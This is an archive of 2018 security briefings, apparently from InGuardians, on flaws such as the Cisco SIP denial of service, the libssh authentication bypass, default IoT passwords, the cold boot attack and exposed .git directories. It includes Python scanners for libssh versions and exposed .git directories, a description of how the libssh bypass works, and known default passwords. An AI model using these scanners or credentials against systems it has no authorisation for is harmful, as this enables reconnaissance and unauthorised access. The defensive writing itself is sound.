Cisco has issued a security advisory describing a denial of service condition in both its flagship Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD).  The flaw is in the Session Initiation Protocol (SIP) inspection engine of ASA versions 9.4+ and FTD versions 6.0+. An attacker can use this to crash these appliances. These are remotely executed denial of service (DoS) attacks, and instances of use have already been seen in the wild.  The flaw is described in National Vulnerability Database (NVD) under the entry CVE-2018-15454.

Impact
InGuardians rates this vulnerability as High impact. As of the end of last week, InGuardians and several other organizations have identified these attacks in the wild.  Cisco ASA and FTD appliances are widely deployed, and there are no patches available at the time of this writing.

Recommendations

InGuardians recommends that all clients running ASA or FTD appliances identify whether the appliances are vulnerable and apply Cisco’s mitigation advice post-haste. As noted, attacks have been seen in the wild and have already caused outages at several organizations.

In the first link under Additional Resources, Cisco lists the following potential mitigations:

- Disabling SIP inspection
- Filtering on a sent-by-address of 0.0.0.0
- Rate limiting SIP traffic
- Blocking offending hosts

In addition, Cisco released information to help identify, through log analysis, whether or not your appliances have been affected by the DoS attacks.  To hunt for active exploitation of this flaw, staff can run the following two commands.

If the appliance is under attack, this command will show a large number of incomplete SIP connections:

show conn port 5060

and this command will show high CPU utilization:

show processes cpu-usage non-zero sorted

If the appliance has been attacked successfully, it will crash and reload.  This indicator will also show up as an unknown abort of the DATAPATH thread in the output of the following command:

show crashinfo as

Additional Resources

Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Denial of Service Vulnerability (Cisco)

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd

Cisco ASA and FTD SIP Inspection denial-of-service vulnerability (CERT)

https://www.kb.cert.org/vuls/id/339704/

Cisco zero-day exploited in the wild to crash and reload devices (ZDNET)

https://www.zdnet.com/article/cisco-zero-day-exploited-in-the-wild-to-crash-and-reload-devices/

InGuardians Resources and Events

On Thursday, the webinar “Kubernetes Hacking and Hardening Episode 2: Bust a Kube” goes live, presented by InGuardians CTO Jay Beale.  Come learn how to hack and defend Kubernetes, containers, and cloud native environments!

Nov 8, 2018 | 10AM PST / 1PM EST
https://www.beyondtrust.com/resources/webinar/kubernetes-hacking-hardening-episode-2-bust-kube/?utm_campaign=ContentMktg&utm_content=webinar&utm_medium=Social&utm_source=tw

Awesome article about vulnerabilities that often get ignored by many security departments. Tyler Robinson shares his experience and provides helpful tips on how to minimize the risk of a cyber attack through non-computer vectors.
https://www.darkreading.com/vulnerabilities—threats/7-non-computer-hacks-that-should-never-happen/d/d-id/1333194

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, our Senior Security Consultant, will hold a mentor session on the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

10/30/2018 Windows ‘Deletebug’ Zero-Day allows privilege escalation, data destruction.

Issue
A proof-of-concept exploit for a Windows zero-day vulnerability has been released that allows an attacker to delete any kind of file on a victim machine, including those containing data vital to the system. The exploit works on fully-patched Windows 10 machines. The vulnerability is in Microsoft’s Data Sharing Service (dssvc.dll). This is a local service that runs as a LocalSystem account with extensive privileges, and enables data to be brokered between applications.

Mitja Kolsek, describing the vulnerability to Threatpost, said, “Even a low-privileged user can make a request to this service for an undocumented function (only Microsoft and possibly a few outsiders know what this function does), and this function checks whether the requesting user has permissions to create a file in a chosen location.”
If a user does not have permission to write the file, it deletes it.

Impact
The problem is the service stops impersonating the user and runs the last step with system privileges, giving the user the ability to delete arbitrary files on the system, whether log files or files they might seek to replace. For example, an attacker may escalate privileges more fully if they could delete the dynamically loaded library (DLL) file from a privileged program, if that program would search for its missing DLL file in a directory to which the attacker can write.

However, as the discoverer SandboxEscaper tweeted, “Here’s a low quality bug that is a pain to exploit…” If SandboxEscaper’s opinion is correct, it is unlikely that there will be immediate wide-reaching uses of the vulnerability. This is in part because an attacker already needs system access or needs to chain this with a remote exploit. With that said, attackers and even automated worm/bot programs chain exploits. InGuardians takes this vulnerability seriously, as does Microsoft, whose Security Response unit notes that the vulnerability is in scope for its Bug Bounty program.

Recommendations
Recognize that this vulnerability affects NEW versions of Windows: Windows 10, Server 2016, and Server 2019. Checking event logs and network logs for any unauthorized access should already be part of IT security efforts. Add to that a search for “impersonation” events, as shown in 0patch’s description.

It is also important to realize that any service running as system may be susceptible to similar flaws or exploits that are as yet unknown. Network access visibility is a critical part of recognizing potential unauthorized intrusions.

Additional Resources
Windows ‘Deletebug’ Zero-Day Allows Privilege Escalation, Destruction
https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/

Microsoft Data Sharing Service
https://social.technet.microsoft.com/Forums/en-US/0cee780c-c55d-4a3a-bfe2-223a78206b1a/data-sharing-service?forum=win10itprosecurity

Sandbox Escaper’s tweet
https://twitter.com/SandboxEscaper/status/1054744201244692485

Tweet from Mitja Kolsek, 0patch co-founder, confirming the zero-day vulnerability
https://twitter.com/mkolsek/status/1054780894785998848

Tweet from 0Patch, regarding micro-patching the vulnerability
https://twitter.com/0patch/status/1054859940945387520/photo/1

Microsoft Security Response Tweet regarding bug bounty
https://twitter.com/msftsecresponse/status/1055156542280884224?s=19

InGuardians Events and Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung fu on Dec 7 at 2PM. We will be hanging out after the conference as well, come say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, our Senior Security Consultant, will hold a mentor session on the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

10/22/2018 Libssh authentication bypass leaves devices vulnerable to unauthenticated shell access.

Issue
A critical authentication bypass bug in libssh versions 0.6 and later has been identified. Libssh is a library implementation of the SSH version 2 protocol for the C programming language, able to run on multiple platforms as both a server and a client. The vulnerability itself is exploited by sending an SSH2_MSG_USERAUTH_SUCCESS message to the server, which in turn presents a shell to the unauthenticated user, giving them access to the endpoint. The code for the exploit is a mere 27 lines and is currently publicly available. Fortunately, fingerprints for the affected services are also publicly available, allowing organizations to scan for exploitable endpoints. So far, the biggest vendor to publicly disclose that it is affected by this issue is F5 Networks, whose BIG-IP Advanced Firewall Manager (AFM) product, versions 12 or newer, is vulnerable to the exploit.

Impact
While the full impact of this issue is still being analyzed, the majority of publicly discovered vulnerable devices, outside of the F5 BIG-IP AFM, are SFTP servers, routers, printers, modems, and Internet of Things (IoT) devices. While the libssh library is not the most popular choice for implementing SSHv2, it is used in a wide variety of devices that could be embedded in any network. Libssh is a relatively new library, and as such only devices purchased or updated after 2014 are likely to be affected.

Recommendations
InGuardians recommends that organizations scan their networks for vulnerable libssh versions and either manually update libssh or, if that is not possible, restrict access to the affected interfaces and work with their software/device vendors to resolve the issue. The Additional Resources below include a Python program that scans networks for this vulnerability.
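The version check such a scan performs, as an added example (not the Leap Security scanner linked below and not InGuardians’ code): it reads the server identification line and decides whether the advertised libssh release falls in an affected range. The fixed releases (0.7.6 and 0.8.4) are from the libssh advisory for CVE-2018-10933; the banner pattern and the sample banners are assumptions constructed for this example.

```python
"""Classify SSH server banners for CVE-2018-10933 (libssh server-side auth bypass).

Added example; not the Leap Security scanner the briefing links. It inspects only
the identification line a server sends first. Fixed releases (0.7.6 and 0.8.4)
come from the libssh advisory; the banner regex assumes the usual
"SSH-2.0-libssh_x.y.z" / "SSH-2.0-libssh-x.y.z" forms, and the sample banners
below are constructed.
"""
import re
import socket
from typing import Optional, Tuple

Version = Tuple[int, int, int]

BANNER_RE = re.compile(r"^SSH-2\.0-libssh[_-]?(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)

# First release in each affected series that carries the fix. The 0.6.x series
# never received one, and 0.9 and later shipped after the fix.
FIRST_FIXED = {7: (0, 7, 6), 8: (0, 8, 4)}


def parse_libssh_version(banner: str) -> Optional[Version]:
    """Return (major, minor, patch) for a libssh banner, or None for anything else."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable(version: Version) -> bool:
    """True when the version lies inside an affected range of CVE-2018-10933."""
    major, minor, _ = version
    if major != 0 or minor < 6:
        return False            # pre-0.6 servers predate the faulty state machine
    if minor == 6:
        return True             # every 0.6.x release is affected; none was fixed
    if minor in FIRST_FIXED:
        return version < FIRST_FIXED[minor]
    return False                # 0.9 and later were released after the fix


def classify(banner: str) -> str:
    """'not-libssh', 'vulnerable' or 'not-affected' for one server banner line."""
    version = parse_libssh_version(banner)
    if version is None:
        return "not-libssh"
    return "vulnerable" if is_vulnerable(version) else "not-affected"


def grab_banner(host: str, port: int = 22, timeout: float = 3.0) -> str:
    """Read the server identification line; RFC 4253 sends it before any authentication."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(255)
    return data.decode("ascii", errors="replace").splitlines()[0] if data else ""


# Constructed sample banners with the expected classification for each.
SAMPLE_BANNERS = {
    "SSH-2.0-libssh_0.7.4": "vulnerable",
    "SSH-2.0-libssh-0.6.3": "vulnerable",
    "SSH-2.0-libssh_0.8.3": "vulnerable",
    "SSH-2.0-libssh_0.8.4": "not-affected",
    "SSH-2.0-libssh_0.5.5": "not-affected",
    "SSH-2.0-OpenSSH_7.4": "not-libssh",
}

if __name__ == "__main__":
    for banner, expected in SAMPLE_BANNERS.items():
        print(f"{banner:26} -> {classify(banner):13} (expected {expected})")
```

A banner check misses distribution builds that backport the fix without changing the version string, and appliances such as the F5 product often do not expose a libssh banner at all; treat "vulnerable" as a lead to confirm with the vendor, not as proof.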

Note that this serious vulnerability was created in an apparent attempt to update a code library. Remember: as code ages, updates to patch make sense, but things are NOT always better merely because they are newer. Test and evaluate BEFORE deploying new code.

Additional Resources
F5 Vulnerability Advisory “K52868493: libssh vulnerability CVE-2018-10933” (F5)
https://support.f5.com/csp/article/K52868493

“CVE-2018-10933 – libssh’s server-side state machine” (F5 Customer Post)
https://devcentral.f5.com/questions/cve-2018-10933-libsshs-server-side-state-machine-62170

“CVE-2018-10933 Detail” (NIST)
https://nvd.nist.gov/vuln/detail/CVE-2018-10933

CVE-2018-10933 Vulnerability Scanner (Leap Security)
https://github.com/leapsecurity/libssh-scanner

Proof of Concept Exploit (GitHub user kn6869610)
https://github.com/kn6869610/CVE-2018-10933

InGuardians Events and Resources

If you are at Wild West Hacking Fest this Friday, watch InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

https://wwhf18.sched.com/event/FoAc/what-to-expect-when-you-are-expectinga-penetration-test

10/17/2018 California Bill SB-327 Highlights IoT’s Weak Password Security Practices

Issue

The “Internet of Things” (IoT) has massively increased the number of Internet-connected devices which can be hacked by anyone with access to those devices’ well-known passwords. The state of California, with the fifth largest economy in the world, has passed a law that will require all devices in the state to either have unique initial passwords or to have a feature allowing owners to set up a method of authentication before first connecting to the device. This law takes effect on the first day of 2020.

Impact

By 2020, makers of Internet-connected devices will be banned from selling devices that have per-product initial passwords. While the presence of default or trivial (e.g., “admin/admin”) credentials might seem almost laughable in the year 2018, unfortunately that is not the case. The Mirai botnet used both default and trivial credentials to compromise more than 600,000 IoT devices in 2016. Using these devices, it sent some of the largest recorded distributed denial of service (DDoS) attacks, in excess of 1.1 terabits per second. The Graham Cluley article referenced below lists the 60 hard-coded passwords, including common manufacturer-set initial passwords like “admin,” “00000000,” and “Zte521.” This problem isn’t confined to IoT devices, either. Last month, Cisco corrected its use of a static root password for all deployed Cisco Video Surveillance Manager devices in two of the last three releases.

Recommendations

InGuardians recommends that every organization check its own devices for trivially weak authentication, whether that entails static, simple, shared passwords (e.g., found in device manuals) or a lack of authentication. While not guaranteed to be comprehensive, a vulnerability scanner like Tenable’s Nessus, Bomgar’s Retina, or the open source OpenVAS, can be particularly helpful, as these tools check for a number of default credentials.

InGuardians recommends that product vendors take the following additional steps to avoid this type of problem:

  • Conduct internal or third party security product reviews to discover these issues well before the first release of a product, as well as before any major update to a product.
  • Review existing manuals and product penetration testing results to determine if password security practices meet best practice and California Bill SB-327.
  • Share California Bill SB-327 with in-house counsel and compliance officers.

InGuardians recommends that product customers take the following additional steps to avoid this type of problem:

  • Conduct regular vulnerability scanning as a component of a process-oriented security program.
  • Build and maintain an inventory of all network-connected devices, including IoT and BYOD.
  • Confirm that all administrative passwords for all devices are unique, strong, differ from vendor defaults, and are maintained in a separate, secure password management system.
  • Place IoT and BYOD devices on separate networks/VLANs, monitored and segmented from each other, from the internal network, and from wide-ranging Internet access.

Additional Resources

California Senate Bill SB-327 (California Legislature)
https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327

Cisco Video Surveillance Manager Appliance Default Password Vulnerability (Cisco Security)
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180921-vsm

These 60 dumb passwords can hijack over 500,000 IoT devices into the Mirai botnet (Graham Cluley)
https://www.grahamcluley.com/mirai-botnet-password/

InGuardians Resources and Events

Online this Thursday, you can learn from InGuardians CTO Jay Beale, as he demonstrates attack and defense on a Linux Capture-the-Flag machine.

https://www.beyondtrust.com/resources/webinar/attacking-defending-linux-ctf/

If you are at Wild West Hacking Fest next Friday, watch out for InGuardians’ Suzanne Pereira and Larry Pesce’s talk, “What to Expect When You are Expecting … A Penetration Test”

https://wwhf18.sched.com/event/FoAc/what-to-expect-when-you-are-expectinga-penetration-test

10/11/2018 Web App Penetration Testing without Threat Hunting May Leave Indicators of Compromise Undetected

Issue
Many web applications that are available from the Internet handle very sensitive information governed under various compliance initiatives such as HIPAA, PCI, GDPR, etc.  Understanding how that information is protected within the application is just as important as understanding the attack surface of the application.  If a threat actor has gained unauthorized access to a web application and its associated data via a particular vector of vulnerability, they will correct the vulnerability immediately, to keep other threat actors out.  Even automated threat actors historically perform this action.  For example, in April of 2017, the Adylkuzz malware used the same ETERNALBLUE exploit that WannaCry would use a month later in May.  WannaCry was unable to infect the quarter million Adylkuzz victims, because Adylkuzz hardened the systems it compromised (by deactivating SMB).   Because attackers so often remove the vulnerabilities they used to compromise systems and networks, a penetration test alone may not demonstrate the full security posture of a web application and the sensitive data housed within.

Impact
In cases where penetration tests are performed without subsequent auditing of the system for embedded threat actors, years may pass before an enterprise learns about a compromise and a threat actor’s presence in its system.  The organization may be violating regulations that govern sensitive data or, even worse, exposing itself to downstream liability issues should the threat actor steal or modify data or conduct fraudulent activity.

Likewise, if proper security controls are not in place to protect the data from a threat actor who has gained access to the application server, then the internal security posture of the application is weak and exposes the organization to risk.

Recommendations
Whenever it is appropriate for a penetration test to be performed on a web application, ensure that two other tasks are also performed. First, threat hunting on the operating systems on which the application and its data reside; second, development of a clear understanding of the data flows, encryption, and other internal controls that should protect the data in the case of a compromise.

Additional Resources
“Getting Ahead of The Adversary – Splunk and Johns Hopkins Demonstrate Threat Hunting Tactics” (Splunk)
https://www.splunk.com/en_us/form/splunk-and-johns-hopkins-demonstrate-threat-hunting-tactics.html

“How to Become a Master Threat Hunter” (Carbon Black)
https://www.carbonblack.com/2017/07/17/become-master-threat-hunter/

Blue Team Services (InGuardians)
https://www.inguardians.com/blue/

InGuardians Events and Resources
A huge thank you to everyone that came by the booth and caught up with us at Derbycon!   A special shout goes out to Annah W. for winning our Derbycon raffle.

If you are at Wild West Hacking Fest, be sure to catch Suzanne Pereira and Larry Pesce’s presentation “What to expect when you’re expecting… a pentest”.  Two of our directors join forces to discuss how you should prepare and operate during a penetration test.

10/2/2018 Which of your secrets do cloud services see?

Issue
Which of your secrets are uploaded to cloud services without your explicit instruction? Consider these cases: a Microsoft Word document about an upcoming merger or executive changeover gets infected with malware, triggering its upload to the anti-virus vendor’s cloud service. Or a software crash on a laptop causes an upload of logs and memory dumps, which contain encryption keys, passwords, and confidential files. Or an anti-virus triggers on a ZIP file, uploading the company’s most sensitive financial data to a service. It’s nearly impossible to affirmatively control this data once uploaded. While cloud-based services can bring enormous benefit in cutting off attacks before many ever see them, they rely mostly on automated guesses about which files to collect, and those guesses may sweep up sensitive information.

Modern security products often look far different from their predecessors from a mere decade ago. In addition to basic functions of blocking unwanted network traffic, anti-virus programs, web proxies, firewalls, VPNs, and even operating systems send various information to cloud-based services. The products’ vendors do this to collect intelligence about malicious activity, crashes, and use patterns to help them understand and react to their customers’ environments.

Security vendors monitor the provided data in real time, reducing many of their customers’ reaction time to potential threats from days to minutes, often automating most of the process. The data have done much to limit opportunities for attackers to obtain unauthorized access or to damage networks after first detection.

However, it’s very easy for proprietary data to get caught up in this. In 2014, software from Kaspersky Labs uploaded suspicious files from a home computer in Maryland. These turned out to be highly classified tools from the National Security Agency’s Tailored Access Operations group, copied by an employee from his work computer to his personal computer. Once the NSA’s tools were compromised, there was no way of reversing this, and the NSA had to halt usage of those tools, likely at significant cost.

The same holds true for anyone using cloud-tied security services. Content from the sites you visit, the files you open, and the software you run may all find its way to a cloud-based vendor. Most will ignore the irrelevant details, but some may parse contents, and some may even sell aggregate or detailed information.

Of course, this problem isn’t confined to security software. Other vendors have used crash data to identify common faults and help developers fix crashes. Photos are automatically uploaded to Apple’s iCloud or Google Photos. Google Sync may automatically back up documents, and cloud storage providers like Box, Dropbox, and Microsoft OneDrive can be configured similarly. Note that any of these services might be configured to use a personal account, rather than one controlled by your organization.

Impact
The vast majority of cloud-based security companies take security very seriously and only a tiny fraction of uploaded files are held for very long. Even fewer receive close scrutiny. However, the need to manually review some submissions means that there is always someone who can see them in their raw state. At that point, the uploading entity has essentially lost all control of the uploaded data. The data is subject to subpoena or warrants, misuse such as insider trading, or theft or leaking by malicious actors.

Avoiding this is possible, but not always easy. The most sensitive files might be managed on “air-gapped” systems (i.e., never connected to a network). Working with air-gapped systems limits productivity, but, when properly done, also creates some of the most secure conditions possible.

Recommendations
InGuardians recommends that companies determine which software running on their systems uploads data to cloud services, what data could be uploaded, and how that data is handled once in the vendor’s hands. Companies can start by investigating Terms of Service, End User License Agreements, and applicable laws and regulations. The next step involves using or establishing vendor security questionnaires, whether custom or from one of the three most popular standards: VSAQ, CAIQ, and SIG/SIG-Lite.

Even strong promises should be approached with caution. Appropriate safeguards for the most sensitive data should be in place using a combination of policy and technology to reduce the risk of inadvertent loss of control. This not only limits the ability of cloud services to gain unexpected access, but also limits dissemination among internal personnel who do not have a need to know.

Additional Resources
Vendor Security Assessment Questionnaire (Google)
https://opensource.google.com/projects/vsaq

Consensus Assessments Working Group (Cloud Security Alliance)
https://cloudsecurityalliance.org/group/consensus-assessments/#_overview

Standardized Information Gathering Questionnaire (SFG Shared Assessments)
https://sharedassessments.org/sig/

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them (Nov 16, 2017)
https://arstechnica.com/information-technology/2017/11/kaspersky-yes-we-obtained-nsa-secrets-no-we-didnt-help-steal-them/

Dropbox takes a peek at files. But it’s totally nothing, says Dropbox. (Sep 13, 2013)
https://www.pcworld.com/article/2048680/dropbox-takes-a-peek-at-files.html

How artificial intelligence stopped an Emotet outbreak (Feb 14, 2018)
https://cloudblogs.microsoft.com/microsoftsecure/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/

InGuardians Resources and Events
Derbycon: If you are at Derbycon this week, stop by the InGuardians booth. Many of our operators will be there demonstrating tools, as well as teaching skills ranging from lock picking to RFID hacking.

09/17/2018 A new Cold Boot attack puts data on full-disk encrypted computers at risk again

Issue
Revisiting the Cold Boot attack, researchers from F-Secure were able to circumvent current protections, gaining access to data on computers even when Full Disk Encryption (FDE) was enabled.

In the original Cold Boot attack, a bad actor boots the computer from a powered-off state. Booting the target system from removable media (such as a USB thumb drive), the attacker uses memory harvesting tools to recover the contents of RAM from the previous boot.  Most importantly, the attacker gains the decryption keys for the computer’s encrypted drive.

After the publication of the original Cold Boot attack methodology, hardware manufacturers instituted methods for protecting the RAM storing the full disk encryption (FDE) keys.  In the most common protection method, specified by the Trusted Computing Group, the computer overwrites the RAM storing those keys at the time of boot.  Unfortunately, this overwrite only occurs when the Memory Overwrite Request (MOR) bit is set in non-volatile memory.

F-Secure’s researchers found that they were able to modify the BIOS system configuration to flip the MOR bit back to zero, disabling the boot-time FDE key RAM overwrites, allowing themselves to use the original Cold Boot attacks to access the full disk encryption keys, and thus the computer’s drive contents.

Impact
With a successful re-implementation of the Cold Boot attack using the updated methodology, it is possible for an attacker to gain access to all of the data stored on a computer, even when FDE is enabled. Should the system contain sensitive information, the attacker can gain full access to the data. The attacker also gains the ability to compromise the computer.

The attacker does face some hurdles in delivering the updated Cold Boot attack. The attacker must have:

  • Unrestricted physical access to the computer under attack
  • Knowledge and experience delivering the first-generation Cold Boot attack
  • The knowledge, experience, and hardware tools needed to rewrite the system’s firmware settings and disable the memory overwrite

These hurdles are surmountable, but the extra step of disabling the memory overwrite is not yet widely known.

Not every system is affected.  The researchers noted that the most recent Apple computers are unaffected by their technique, because those machines carry an Apple T2 chip, which keeps the encryption keys in its “secure enclave” rather than in system RAM.

Recommendations
In most cases there are simple measures that thwart the updated Cold Boot attack described by F-Secure’s researchers:

  • Train employees to shut down or hibernate their computers rather than putting them to sleep; a sleeping machine keeps the FDE keys in RAM. Consider using Group Policy to enforce this behavior across all computers belonging to the organization.
  • Proper physical security: computers in public or semi-public locations (a laptop in a hotel room, for example) should never be left unattended or “out in the open”.  They should remain with the owner or be physically secured in a manner that prevents tampering (placed in the room safe, in the case of a hotel).
  • Stronger FDE configuration: require a BitLocker PIN at boot.  With a TPM-only configuration, the firmware unseals the volume key automatically during boot, so an attacker who powers on a shut-down or hibernated machine still gets the key loaded into RAM, ready to harvest.  With a pre-boot PIN, the key is not released until the PIN is entered, so a cold-boot harvest of a powered-off or hibernated machine finds nothing usable.

Additional Resources
“Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data” (TechCrunch)
https://techcrunch.com/2018/09/12/security-flaw-in-nearly-all-modern-pcs-and-macs-leaks-encrypted-data

“New modification of the old cold boot attack leaves most systems vulnerable” (Ars Technica)
https://arstechnica.com/gadgets/2018/09/cold-boot-attacks-given-new-life-with-firmware-attack/

The Chilling Reality of Cold Boot Attacks (F-Secure)
https://blog.f-secure.com/cold-boot-attacks/

TCG Platform Reset Attack Mitigation Specification (Trusted Computing Group)
https://trustedcomputinggroup.org/wp-content/uploads/Platform-Reset-Attack-Mitigation-Specification.pdf

InGuardians Resources and Events
The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec,” by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects by focusing on people, communication and advocacy. Read more:  https://www.linkedin.com/pulse/12-things-i-learned-hard-way-being-project-manager-infosec-pereira/

Get some serious RF/Wireless kung fu training from InGuardians Director of Research Larry Pesce at SANS in Las Vegas, Sept 23 – 28, 2018.
https://www.sans.org/event/network-security-2018/course/wireless-penetration-testing-ethical-hacking

Dive deep into ICS Security with hands-on training from Justin Searle, our Director of ICS Security at SANS Las Vegas, Sept 23 – 27, 2018.
https://www.sans.org/event/network-security-2018/course/ics-scada-cyber-security-essentials

09/10/2018 Over 400k websites expose sensitive data via .git/ directory

Issue
Speed + Complexity => Errors => Vulnerability.  Your system is probably exposed.
Every week we try to focus on a relevant vulnerability to describe the issue in terms of client exposure. We point to information resources and mitigation strategies to improve security posture and vulnerability detection. This week, InGuardians’ editorial team had too many from which to choose. Here are but a few of the week’s disclosures:
–  NotPetya would have destroyed Maersk’s system if not for ONE server that had been offline due to a power outage.
–  IoT malware infecting aircraft SATCOM systems
–  Schneider controller vulnerability
–  British Airways data breach
–  mSpy’s second data breach
–  400,000 websites expose sensitive system development data via .git/ directories.
The real question, then, is: if you presume you are exposed, how do you detect and mitigate the risks?
In this week’s newsletter, we focus on the .git/ directory exposure in particular.

Impact
Open .git directories can contain a great deal of sensitive information: the web application’s source and structure, database passwords, API keys, development IDE settings, and more. Czech researcher Vladimir Smitka found over 390,000 websites, the majority under the .com TLD, with Internet-readable .git/ directories.

The cause is in part a flawed check that many developers use to confirm that /.git is hidden. Requesting /.git/ from a web server usually produces an HTTP 403, which reads as “blocked” but is a false negative: the 403 only means that the directory has no index file (index.html, index.php, …) and that directory listing is disabled. The individual files beneath it are still served. Smitka instead requested /.git/HEAD, a file every checkout contains, and found that a great many web applications returned its contents, exposing the rest of the .git/ directory with it.
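The probe Smitka used, as an added example that is not taken from the briefing or from his scanner: request /.git/HEAD and check that the body has the format git writes there, rather than trusting a 403 on the directory itself. The HTTP layer is injected so the logic runs offline against constructed responses (the site names and bodies are made up for the example); substitute a real client for fake_fetch.

```python
"""Probe a site for a world-readable .git/ directory.

Added example; not code from the briefing or from Smitka's scanner.
Requesting /.git/ alone is not a valid check: a 403 only means the
directory has no index file and is not auto-indexed, while the files
beneath it may still be served. The reliable probe is /.git/HEAD, which
every checkout contains and whose first line is either "ref: refs/..."
or, for a detached HEAD, a 40-hex-character commit id. The HTTP layer is
injected so the logic runs offline; the site names and bodies below are
constructed for the example, and fake_fetch stands in for a real client.
"""
import re
from typing import Callable, Dict, Iterable, Tuple

# A fetch function returns (status_code, body_text) for a URL.
Fetch = Callable[[str], Tuple[int, str]]

HEAD_REF = re.compile(r"^ref: refs/\S+$")
HEAD_DETACHED = re.compile(r"^[0-9a-f]{40}$")


def looks_like_git_head(body: str) -> bool:
    """True if the body's first line has the format git writes to HEAD."""
    lines = body.strip().splitlines()
    first = lines[0].strip() if lines else ""
    return bool(HEAD_REF.match(first) or HEAD_DETACHED.match(first))


def classify_git_exposure(fetch: Fetch, base_url: str) -> str:
    """Return 'exposed', 'hidden' or 'inconclusive' for one site.

    exposed      -> /.git/HEAD is served and has git's HEAD format
    hidden       -> /.git/HEAD is refused or absent (401/403/404)
    inconclusive -> something else, e.g. a catch-all page answering 200
                    for any path; needs a human look
    """
    status, body = fetch(base_url.rstrip("/") + "/.git/HEAD")
    if status == 200 and looks_like_git_head(body):
        return "exposed"
    if status in (401, 403, 404):
        return "hidden"
    return "inconclusive"


def scan(fetch: Fetch, sites: Iterable[str]) -> Dict[str, str]:
    """Classify each site in turn; returns {site: verdict}."""
    return {site: classify_git_exposure(fetch, site) for site in sites}


# --- constructed sample responses (not captured from any real site) ---
SAMPLE_RESPONSES = {
    # Site A: listing is off, so a naive probe of /.git/ sees a 403 ...
    "https://site-a.example/.git/": (403, "Forbidden"),
    # ... but files under it are served, and HEAD has git's format.
    "https://site-a.example/.git/HEAD": (200, "ref: refs/heads/master\n"),
    # Site B: the web server denies the whole .git tree.
    "https://site-b.example/.git/HEAD": (403, "Forbidden"),
    # Site C: a catch-all route answers 200 with HTML for any path.
    "https://site-c.example/.git/HEAD": (200, "<html><body>Welcome</body></html>"),
    # Site D: detached HEAD (bare commit id); still exposed.
    "https://site-d.example/.git/HEAD": (200, "0123456789abcdef0123456789abcdef01234567\n"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for an HTTP GET, answering from the table above."""
    return SAMPLE_RESPONSES.get(url, (404, "Not Found"))


if __name__ == "__main__":
    for site, verdict in scan(fake_fetch, ["https://site-a.example", "https://site-b.example",
                                           "https://site-c.example", "https://site-d.example"]).items():
        print(f"{site}: {verdict}")
```

To close the hole rather than merely find it, deny the whole tree at the web server (nginx: location ~ /\.git { deny all; }; Apache: RedirectMatch 404 /\.git) and, better still, deploy from a build artifact so the checkout never sits under the document root at all.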

Recommendations
Checking that a directory is hidden is good, provided the check is valid.  When verifying directories in particular, consider how the request is framed and what actually happens when a URL or other query fails: what produced the error, what does the error message say, and does it prove what you think it proves?

Developers and other staff are under pressure to create and deploy systems quickly – that’s not going to change. However, the process must include thorough systems review and policy guidance to catch potential failures early. In today’s multiple-releases-per-day DevOps world, that will mean automating sound checks as part of the build and deployment pipeline.

These themes ran through the breaches and vulnerabilities disclosed this week. Consider mSpy, a popular spyware tool for monitoring kids and others. Let’s take a leap of faith and say it’s used for GOOD THINGS, like ensuring the kids are home after school. The hacked database required no authentication. It exposed broad categories of data, including Apple iCloud usernames and authentication tokens, Facebook posts, emails, credit card transactions, and more. So the information from the mSpy breach could well include what is needed to access a company network.  Our mobile devices collect more than we may realize.

The general lesson is that a single web server misconfiguration can leak information that enables both internal disruption and external exposure. This week’s plethora of choices were not (necessarily) related, but EVERY week there is something. Every organization must continuously examine its security architecture to eliminate single points of failure and to prevent information resident on one compromised system from providing the keys for a pivot to domain controllers or the organization’s key networks. Mobile devices mean internal networks have more external connections than their architects may realize. Remember gadgets, BYOD mobile devices, and apps like mSpy when considering information technology’s footprint.

Additional Resources
“400,000 Websites Vulnerable through Exposed .git Directories” (SC Magazine)
https://www.scmagazine.com/home/news/400000-websites-vulnerable-through-exposed-git-directories/

“Open git Global Scan” (Vladimir Smitka)
https://smitka.me/

NotPetya analysis (Wired)
https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world

IoT Malware and SATCOM (Helpnet Security)
https://www.helpnetsecurity.com/2018/08/10/satcom-systems-security/

Schneider Electric Controller Vulnerability (Security Week)
https://www.securityweek.com/flaw-schneider-plc-allows-significant-disruption-ics

British Airways Data Breach (CNN Money)
https://money.cnn.com/2018/09/07/investing/ba-hack-british-airways/index.html

mSpy Mobile Spyware data breach (Krebs on Security)
https://krebsonsecurity.com/tag/mspy-breach/

InGuardians Resources and Events

